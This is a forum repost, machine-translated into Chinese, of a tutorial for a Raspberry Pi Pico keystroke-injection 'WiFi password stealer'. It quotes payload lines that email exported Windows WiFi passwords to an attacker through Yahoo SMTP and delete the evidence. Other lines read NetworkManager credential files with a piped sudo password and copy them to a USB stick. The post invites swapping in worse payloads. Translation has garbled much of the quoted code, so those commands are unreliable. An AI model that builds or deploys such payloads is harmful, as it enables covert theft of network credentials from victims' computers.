WiFi-Password Sterer-简单的Windows和Linux击键注入工具 可删除存储的WiFi数据(SSID和密码)

taibeihacker

Moderator
AVvXsEi3BR6gk1ojrgjo7rrQbmnJlxYCorUBwBxQqAStqC7OuMBC7j0L3IaTVGPiFIfFWSGmU1juhdpfzD9JcMg6eW_ySbbKuwEEq9A9-C7R2Olg7I7Wot2Y_MkxHlQ_n_LFCO0RWMa2WSFCZzLz_-MIU7w7znjGkIgHDroL6m0OHtiE2C-8A2GtM7QdUopjYY4l=w400-h400

您是否曾经看过一部电影,黑客将插入插件,看似普通的USB驱动到受害者的计算机并从中窃取数据? - 适合某些人的湿梦。
Disclaimer:此项目中的所有内容仅用于安全研究目的。

Introduction​

在2022年夏天,我决定做到这一点,以构建一种设备,使我可以从受害者的计算机中窃取数据。那么,一个人如何部署恶意软件和渗透数据?在以下文本中,我将解释所有必要的步骤,理论和细微差别,以构建自己的击键注入工具。尽管该项目/教程重点关注WiFi密码,但可以轻松更改有效载荷代码,以执行更负面的事情。您只受到自己的想象力(以及技术技能)的限制。

Setup​

创建Pico-Ducky之后,您只需要复制修改后的有效负载(对Windows漏洞利用的SMTP详细信息调整和/或针对Linux密码和USB驱动器名称进行了调整)。

Prerequisites​

对受害者计算机的物理访问。
解锁受害者的计算机。
受害者的计算机必须具有Internet访问,才能使用SMTP在网络媒体上使用SMTP进行渗透。
了解Linux利用受害者的计算机密码。

Requirements - What you'll need​

AVvXsEhTWje5ffXPaNk_E74-ieoqACL97KzDgTBYNXAPwctP6Wrs94eS_SzsYBNW4FdMIqick-8gzNhxdEGOEimiXU_jtb4mJk9gUdB81TETx8JaqOHh5bOzCYT4bUahT8hOFE5omW7VSFdnhKGEMTybKOp-BQe3UZxwReJHpaykBGJQ1aFVyiLYt39p99pflyRv=w284-h400

Raspberry Pi Pico(RPI PICO)微型USB到USB电缆跳线电线(可选)PICO -DUCCHY-将RPI PICO转换为USB橡胶鸭USB USB Flash Drive(仅用于在物理介质上的利用)
Note:
可以使用橡胶鸭子制造此工具,但请记住,RPI PICO的价格约为4.00美元,而橡皮鸭的价格为80.00美元。
但是,尽管Pico-Ducky是一个很好的预算解决方案,但Rubber Ducky确实提供了诸如最新的Duckyscript版本之类的东西。
为了使用Ducky脚本在RPI PICO上编写有效载荷,您首先需要将其转换为Pico-Ducky。请按照以下简单的步骤来创建Pico-Ducky。

Keystroke injection tool​

击键注入工具一旦连接到主机计算机,就通过运行模拟用户输入的键盘的代码来执行恶意命令。虽然它看起来像USB驱动器,但它的作用类似于键盘,该键盘在预编程有效载荷中类型。橡皮鸭等工具每分钟可以输入超过1,000个字。创建后,任何具有物理访问的人都可以轻松部署此有效负载。

Keystroke injection​

有效载荷使用字符串命令进程击键进行注入。它接受一个或多个字母数字/标点字符,并将其剩余的按原样键入目标机器。 Enter/Space将模拟键盘键的按下。

Delays​

我们使用delay命令暂时暂停有效载荷执行。当有效负载需要等待命令行加载等元素时,这很有用。当新的USB设备连接到目标计算机时,延迟很有用。最初,计算机必须在开始接受输入命令之前完成一组操作。如果HIDS设置时间非常短。在大多数情况下,它需要一秒钟,因为驾驶员是内置的。但是,在某些情况下,较慢的PC可能需要更长的时间才能识别Pico-Ducky。一般建议是根据您的目标调整延迟时间。

Exfiltration​

数据剥落是从计算机/设备中未经授权的数据传输。收集数据后,对手可以使用加密或压缩在网络发送数据时避免检测。两种最常见的剥离方式是:
网络介质上的渗透。此方法用于Windows利用。可以在这里看到整个有效载荷。
在物理介质上渗出。这种方法用于Linux利用。可以在这里看到整个有效载荷。

Windows exploit​

要使用Windows有效载荷(payload1.dd),您无需连接销之间的任何跳线。

Sending stolen data over email​

一旦将密码导出到.TXT文件,有效载荷将使用Yahoo SMTP将数据发送到指定的电子邮件。有关更详细的说明,请访问以下链接。另外,需要使用SMTP信息更新有效负载模板,这意味着您需要更新receiver_email,sender_email和您的电子邮件密码。此外,您还可以更新电子邮件的身体和主题。
wifi-password-stealer/pareload/paryload_windows.template.dd
25cf7c5中的第31行
字符串send -mailMessage -to'receiver_email'-from'sender_email'-subignt'从pc' - body' - body'被删除的数据存储在附件中。 -Attachments。\ wifi_pass.txt -smtpserver'smtp.mail.yahoo.com'-credential $(new -object System.Management.Automation.Automation.PScredential -argumentList'sender_email_email_email_email',$('
Note:
通过电子邮件发送数据后,txt文件将被删除。
您也可以使用另一个电子邮件提供商中的SMTP,但是您应该注意SMTP服务器和端口号,您将在有效载荷中编写。
请记住,某些网络可能会阻止防火墙中未知SMTP的使用。

Linux exploit​

要使用Linux有效载荷(PAYLOAD2.DD),您需要在GND和GPIO5之间连接跳线,以便遵守RPI PICO上的Code.py中的代码。有关如何在RPI PICO上设置多个有效载荷的更多信息,请访问此链接。
AVvXsEiWE9d0QwGO-IxNJ1baOGdFUcaAPKRtGPDe7SlijX7vSxnHXIO0sI3Hde3GhwYFE-3GOJwOXGZCu2Q_FfJdKzRCV_wWFLNCXtaneoLdhK86GmESw6bJ9N9F1OpchGDsWPX97teABpPYtSQG9vAhUM8HJCFdarz5iAPDdj1QCilzS460Xbz2eXLQyR9IfMFp=w640-h360

Storing stolen data to USB flash drive​

一旦从计算机导出密码,数据将保存到指定的USB闪存驱动器中。为了使此有效载荷正常运行,需要使用USB驱动器的正确名称对其进行更新,这意味着您需要在两个地方用USB驱动器的名称替换USBSTICK。
wifi-password stealer/paryload/paryload_linux.template.dd
25cf7c5中的第3行
STRING echo -e 'Wireless_Network_Name Password\n--------------------- --------' /media/$(hostname)/USBSTICK/wifi_pass.txt
wifi-password stealer/paryload/paryload_linux.template.dd
25cf7c5中的第11行
字符串完成/媒体/$(hostname)/usbstick/wifi_pass.txt
此外,您还需要在三个地方更新有效载荷中的Linux密码。如上所述,为了使这种利用成功,您需要知道受害者的Linux机器密码,这使此攻击不那么合理。
wifi-password stealer/paryload/paryload_linux.template.dd
A90FFB2中的第7行
字符串回声密码| sudo -s回声
wifi-password stealer/paryload/paryload_linux.template.dd
A90FFB2中的第9行
字符串do echo -e'$(sudo password cat'$ file'| grep -op'(?=ssid=)。

Bash script​

为了运行wifi_passwords_print.sh脚本,您需要使用USB棒的正确名称更新脚本,然后您可以在terminal:中输入以下命令
回声密码| sudo -s sh wifi_passwords_print.sh usbstick,其中密码是您的帐户密码,USBSTICK是您的USB设备的名称。

Quick overview of the payload​

NetworkManager基于连接配置文件的概念,它使用插件来读取/写作数据。它使用.ini风格的键文件格式并存储网络配置配置文件。关键文件是一个支持NetworkManager拥有的所有连接类型和功能的插件。这些文件位于/etc/networkmanager/system-connections/中。基于密钥文件格式,有效载荷将GREP命令与Regex一起使用,以提取感兴趣的数据。对于文件过滤,使用了修改的正求主断言((?=关键字))。虽然正面的主张将在字符串中的某个位置匹配,但SC。在关键字之后的位置,而无需使该文本本身的一部分,以下是正则(?=关键字)。*将匹配关键字之后的任何文本。这允许有效载荷匹配SSID和PSK(预共享密钥)关键字之后的值。
有关网络管理器的更多信息,这里有一些有用的链接:
以下的密钥文件格式描述插件

Exfiltrated data formatting​

以下是在.txt文件中受害者的计算机中的删除和格式化数据的一个示例。
wifi-password-Stealer/resources/wifi_pass.txt
F5B3B11中的第1至5行
Wireless_network_name密码-------------
 
返回
上方